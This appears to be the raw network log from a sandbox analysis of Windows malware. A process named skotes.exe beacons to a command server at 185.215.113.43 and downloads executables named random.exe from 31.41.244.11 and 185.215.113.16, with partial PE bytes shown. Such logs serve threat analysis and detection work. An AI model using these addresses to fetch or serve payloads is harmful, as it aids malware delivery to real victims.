Dec 19, 2024 10:11:12.884042025 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 18 Dec 2024 09:54:38 GMT Age: 83794 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 19, 2024 10:11:12.899730921 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 19, 2024 10:11:13.215023041 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 18 Dec 2024 09:54:38 GMT Age: 83795 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 19, 2024 10:11:13.324384928 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 19, 2024 10:11:13.643177986 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 18 Dec 2024 09:54:38 GMT Age: 83795 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 19, 2024 10:11:14.549010038 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 19, 2024 10:11:14.863326073 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 18 Dec 2024 09:54:38 GMT Age: 83796 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 19, 2024 10:11:15.418108940 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 19, 2024 10:11:15.746818066 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 18 Dec 2024 09:54:38 GMT Age: 83797 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 19, 2024 10:11:19.500021935 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 19, 2024 10:11:19.814371109 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 18 Dec 2024 09:54:38 GMT Age: 83801 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 19, 2024 10:11:29.994678020 CET	6	OUT	Data Raw: 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	50083	185.215.113.43	80	6316	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:11:14.443274021 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 37 34 38 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017483001&unit=246122658369
Dec 19, 2024 10:11:15.787676096 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 19 Dec 2024 09:11:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.6	50084	31.41.244.11	80	6316	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:11:15.912466049 CET	61	OUT	GET /files/martin/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 19, 2024 10:11:17.241286993 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 19 Dec 2024 09:11:17 GMT Content-Type: application/octet-stream Content-Length: 4462080 Last-Modified: Thu, 19 Dec 2024 08:25:21 GMT Connection: keep-alive ETag: "6763d871-441600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9f 99 62 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 44 49 00 00 24 6c 00 00 32 00 00 00 c0 bd 00 00 10 00 00 00 60 49 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 f0 bd 00 00 04 00 00 db 70 44 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 90 69 00 73 00 00 00 00 80 69 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 ae bd 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e4 ad bd 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELbg(DI$l2`I@pD@ _isi4 piH(@.rsrciX(@.idata iZ(@ 8i\(@wkxymklc ^(@kwrsqshrC@.taggant0"C@
Dec 19, 2024 10:11:17.241466999 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 19, 2024 10:11:17.241477013 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 19, 2024 10:11:17.241487026 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 19, 2024 10:11:17.241497993 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 19, 2024 10:11:17.241641998 CET	672	IN	Data Raw: fe 51 85 28 76 00 c2 b2 9f a8 f7 57 ca ff cf 0c c3 25 5e 60 93 68 74 e6 41 5a bd c7 b6 2d 78 1e 96 5f d0 4f 3a c5 30 2e 4e d4 28 bf de c8 96 37 c9 4e 07 df 7a ad 5b a2 88 77 00 b7 23 2c 34 9f 70 10 1b f1 8a c3 ca 92 d1 6a 9f e7 2a a6 59 27 01 b2 Data Ascii: Q(vW%^`htAZ-x_O:0.N(7Nz[w#,4pjY'^){[@2fdNo'Z\|u)j/OotnL'QA:n7_V(\_<o2V=O0S(,Pj6co TP8g^#P)D1K'(?c@mABE.zE_c;c\
Dec 19, 2024 10:11:17.241909027 CET	1236	IN	Data Raw: 8d fe 01 ea 10 0e 43 d6 32 33 2c 32 ae 63 fe 48 64 80 51 f2 40 a3 ce e1 47 d4 9a e1 60 54 f8 45 c6 48 ab 4e 74 36 67 cf 25 fb 36 bc 50 8c 6b 3f 5c b4 0a 3f f9 44 0b 82 7f e4 95 71 ef 50 57 a6 1d 1d ff df 4b 42 00 7a 40 80 f8 35 4a 74 77 9f 1a db Data Ascii: C23,2cHdQ@G`TEHNt6g%6Pk?\?DqPWKBz@5JtwxsUZdAQ[LA;^:2,)M!no Fl UN>Nxsd0r^dbEnfat\_%#Ib
Dec 19, 2024 10:11:17.241919041 CET	1236	IN	Data Raw: c5 54 68 a3 06 5e ef cb 71 57 1e 80 75 98 54 a5 ff f0 e7 ec b1 2c 2a c0 b5 20 26 f5 90 ca 16 a6 c6 84 eb 75 61 af 0f 62 cb 24 66 3f 67 68 20 0d e5 c8 cc 67 65 c0 aa e6 fa 40 85 62 f5 ee 5d a9 43 62 15 a7 ca 31 4f 9d f6 43 a0 ae fd a7 6f 75 31 47 Data Ascii: Th^qWuT,* &uab$f?gh ge@b]Cb1OCou1G&W\|Y-:dZLHv]n`9a$(K>%q^V>i=gfJL!5HzH$51cM$L/X/iF'g2vyA%z/Tm
Dec 19, 2024 10:11:17.241930962 CET	1236	IN	Data Raw: 7f c7 b1 00 83 f4 3b 09 a5 af f8 be 3b 88 6f ea 3e 09 8d b2 9a 5d 6a f6 30 2c 8e f2 7f 2c 6f 2d 29 02 3d c4 95 93 98 60 11 81 9d 27 5f 31 43 ae 91 55 89 3e 70 23 76 e5 02 a4 2a f6 b1 1e 54 fa cf 1b f8 e6 51 30 fc 98 91 43 f0 0c 85 a5 7b 51 56 72 Data Ascii: ;;o>]j0,,o-)=`'_1CU>p#v*TQ0C{QVr&KUL"q.2f"X\)@0$b"$v-oY1)c\|?ZIEN2O?B!_B+ZnbE(CL's&dS
Dec 19, 2024 10:11:17.242290020 CET	1236	IN	Data Raw: e6 c4 76 47 90 b4 0b c0 6c 7a 1a a4 0c 3f e9 16 80 a8 83 ae 8f 60 46 f9 ff f6 14 4f 7e ec 2e b9 3a 24 6a db e1 64 68 67 60 b4 a8 3e 6c 7c 37 8e c8 ef a9 59 b9 eb a7 52 e1 11 0d a1 c8 4e f0 f6 00 b8 58 31 be fa 07 c7 5b 2d fb 2d ab 24 3c 54 fe 4e Data Ascii: vGlz?`FO~.:$jdhg`>l\|7YRNX1[--$<TNh~ 5q9\|qipY^`&{i<<H61&#+Xb[9Ny,X@67Gn)r\e2&SOWD$ImNQw/ vsU ~?o
Dec 19, 2024 10:11:17.361047983 CET	1236	IN	Data Raw: b6 8c f3 25 bb e0 05 a1 c8 5a 98 09 c7 94 17 7a 0d 86 c4 88 23 16 e8 a8 26 5d c8 a2 4c af d0 81 fa d7 a4 77 2d ac 91 ce 9b 50 36 be 34 6d 08 97 34 9a 07 14 b2 ab 71 ec 79 1f b5 91 bd e2 e8 ac cf d8 26 85 c4 3f 27 99 ba 17 2f aa b2 b3 cf 29 57 cd Data Ascii: %Zz#&]Lw-P64m4qy&?'/)W<gU"[BhRk8/R4Z A'N\/_Ets'ZW&yDSGC:^5 7Z f" Awg5W8,bGH"Y[<'bg&{

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.6	50087	185.215.113.16	80	4132	C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:11:23.020520926 CET	80	OUT	GET /mine/random.exe HTTP/1.1 Host: 185.215.113.16 Cache-Control: no-cache
Dec 19, 2024 10:11:24.361876011 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 19 Dec 2024 09:11:23 GMT Content-Type: application/octet-stream Content-Length: 3032576 Last-Modified: Thu, 19 Dec 2024 08:27:54 GMT Connection: keep-alive ETag: "6763d90a-2e4600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 f0 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-ICCC@CFBC6GC6@C6FCGCBCB5CxJCxCxACRichCPELVf1@ 2=.@Wk11 @.rsrc@.idata @zopdawvw0+*+@hctdavsk1 .@.taggant01"$.@
Dec 19, 2024 10:11:24.362107992 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 19, 2024 10:11:24.362123966 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 19, 2024 10:11:24.363085032 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 19, 2024 10:11:24.363101006 CET	1236	IN	Data Raw: 7d ea 6a 9c ac 98 bb e2 cf cb 46 90 60 cf c4 06 9f 77 e3 d1 16 25 aa 0e be 45 ce bc bd a9 da 61 d1 ed b5 17 dc ad 5e 5c b8 b4 66 5e 3c c6 55 78 0c b5 9a 1c 08 d3 29 81 de b6 ea ed a6 18 db 02 3c 29 77 4d 44 74 27 00 ae f8 d8 5f fc b6 12 4a af 54 Data Ascii: }jF`w%Ea^\f^<Ux)<)wMDt'_JTs'L)Ae}$ bB'1:E.<)&-E@\\|#wCNngTI\5NEi}k.)tY'N]Fx`$\~
Dec 19, 2024 10:11:24.364173889 CET	1236	IN	Data Raw: cd e9 f0 cc 8c 01 2b 9e 94 0d 87 1b 55 84 40 27 1c e7 de 29 af 28 a7 a4 2f e2 da 21 30 2d ba 5c 2c c7 72 54 fe 8d c3 96 31 0b af 49 07 a9 3a ac 80 48 5b 41 a6 f8 c7 50 84 a7 59 89 bd 15 47 60 dc e9 cc 4d 9c 3d 9d 7e 50 fc db 35 8c 6c e7 bd 22 46 Data Ascii: +U@')(/!0-\,rT1I:H[APYG`M=~P5l"F-P5.&>pWuPJ=[lFk'oa>bax!PtixjPS0jesP%h~-41HUm*&o _m?{
Dec 19, 2024 10:11:24.364192009 CET	1236	IN	Data Raw: 4b c0 a1 38 e4 be a6 a2 f8 b4 23 da ae c6 82 0f 55 5c b5 7c 29 39 88 2c 1d cf f1 20 d4 b7 82 67 8b 66 94 6b f8 cc d5 be d4 16 c7 a0 dd 51 e8 9f ca 3d a1 cf 24 ac 40 4b ef 8d b7 5e 5b 99 75 c0 24 ce 6c f3 2e 51 e7 a1 85 4a 63 ae e4 da ad a2 68 09 Data Ascii: K8#U\\|)9, gfkQ=$@K^[u$l.QJchDPz}m\~Rrm(D=ld[>k'fri*bkVNi5zx8_T&(a$!RtYKu
Dec 19, 2024 10:11:24.365288019 CET	1236	IN	Data Raw: 55 8f d8 27 ae 4d 6d 4b 90 a9 7e 84 54 6f 2a 45 04 da 50 bf ea 5d c5 81 ae 2f 5f 39 8e f4 f3 22 98 b1 f5 26 4a 55 71 b0 03 51 bf 0c 58 9e 1f b8 a4 25 ce 94 11 0b d8 5b d3 24 57 a2 85 6c 22 ed a1 f7 11 0d aa 2f 3e 27 af 69 ce e6 f9 d0 8f 4b 13 c2 Data Ascii: U'MmK~To*EP]/_9"&JUqQX%[$Wl"/>'iK]6nu<asY=j!Y`XAZsh s$ZjT0+U0oEk?R!,J+zIJDFDZ+H:f2+Qj.?["8
Dec 19, 2024 10:11:24.365314960 CET	1236	IN	Data Raw: 31 89 d5 dd 5e 63 36 a3 e8 90 e6 b5 6c c6 c2 cd 33 87 19 2a 98 d1 ba e7 61 85 07 97 5b 7b 33 a0 4c ad 52 a2 80 a6 60 93 9a 66 6b 4e 34 c0 ba a4 e7 89 9c 04 4b e3 e2 5b 75 a6 54 a4 a2 be 94 6c e0 c4 9a fa b7 76 32 cb 67 f3 21 02 9f 35 e2 90 49 83 Data Ascii: 1^c6l3*a[{3LR`fkN4K[uTlv2g!5IwCfUc?P0#@h6K_O}yv:A#Svp?qxCv7i)#GPa:WbxuhTQom^Cs&f_hs?2(P_\|;'n
Dec 19, 2024 10:11:24.366322041 CET	1236	IN	Data Raw: 95 bb 7a 17 aa f7 1e e1 bd 53 64 59 06 34 6b 7d 60 cf 77 74 e4 69 ec e0 80 97 c5 7b 0f 8b 54 bf 5a 8a a9 98 42 6f cb 1b ae af 62 19 82 35 69 1d 1b f2 a6 5c b8 b5 e5 b9 ce 2e 3d 58 cc 78 07 86 d3 7d d5 e9 8c bb c0 6c 0c d4 f3 81 44 78 3c 88 7d 01 Data Ascii: zSdY4k}`wti{TZBob5i\.=Xx}lDx<}3}I[5^i8y\|BJ9fSOE4Gj`]E:GjZF}\|$D\i$y'ifixy+F`mog11b;,=F8;
Dec 19, 2024 10:11:24.483309984 CET	1236	IN	Data Raw: f4 e7 3e 37 e2 ef e2 90 13 eb ff ac f4 39 6f b0 46 8d 45 23 96 3e e3 21 14 d9 2c 44 10 7d eb 29 0c 0e c4 f9 90 c9 46 41 c1 4b 5c ef d5 3d 6b d7 24 6c 27 18 90 79 57 26 a4 36 0c b8 9a 39 11 ba 3f 00 b0 4e 46 91 29 bb 2f 16 b3 2e 56 d1 cb cd 42 7d Data Ascii: >79oFE#>!,D})FAK\=k$l'yW&69?NF)/.VB}!-T'Xch._yYE0?56*QXcV/Xjw0:'i8GSvf])>3&"2TwoZ]002uFYaJR&>)-n\|_

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.6	50089	185.215.113.43	80	6316	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:11:27.366981030 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 37 34 38 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017484001&unit=246122658369
Dec 19, 2024 10:11:28.700900078 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 19 Dec 2024 09:11:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	50091	31.41.244.11	80	6316	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:11:28.834312916 CET	62	OUT	GET /files/unique3/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 19, 2024 10:11:30.160099983 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 19 Dec 2024 09:11:29 GMT Content-Type: application/octet-stream Content-Length: 1943552 Last-Modified: Thu, 19 Dec 2024 08:25:08 GMT Connection: keep-alive ETag: "6763d864-1da800" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cd d8 9a 7a 89 b9 f4 29 89 b9 f4 29 89 b9 f4 29 c2 c1 f7 28 82 b9 f4 29 c2 c1 f1 28 06 b9 f4 29 c2 c1 f0 28 9d b9 f4 29 9c c6 f1 28 af b9 f4 29 9c c6 f0 28 98 b9 f4 29 9c c6 f7 28 9d b9 f4 29 c2 c1 f5 28 8a b9 f4 29 89 b9 f5 29 da b9 f4 29 89 b9 f4 29 8b b9 f4 29 b3 39 f0 28 8a b9 f4 29 b3 39 0b 29 88 b9 f4 29 b3 39 f6 28 88 b9 f4 29 52 69 63 68 89 b9 f4 29 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 5f 7b 5f 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 25 00 7c 03 00 00 5e 03 00 00 00 01 00 00 60 4a 00 00 10 00 00 00 90 03 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$z)))()()()()()()()))))9()9))9()Rich)PEL_{_d%\|^`J@JT@Vjl <@.rsrclL@.idata T@ 0)V@uyrmuypf0 1*X@pdddsseoPJ@.taggant0`J"@
Dec 19, 2024 10:11:30.160535097 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 19, 2024 10:11:30.161115885 CET	448	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 19, 2024 10:11:30.161153078 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 19, 2024 10:11:30.162471056 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: !} y5 H3,gvT
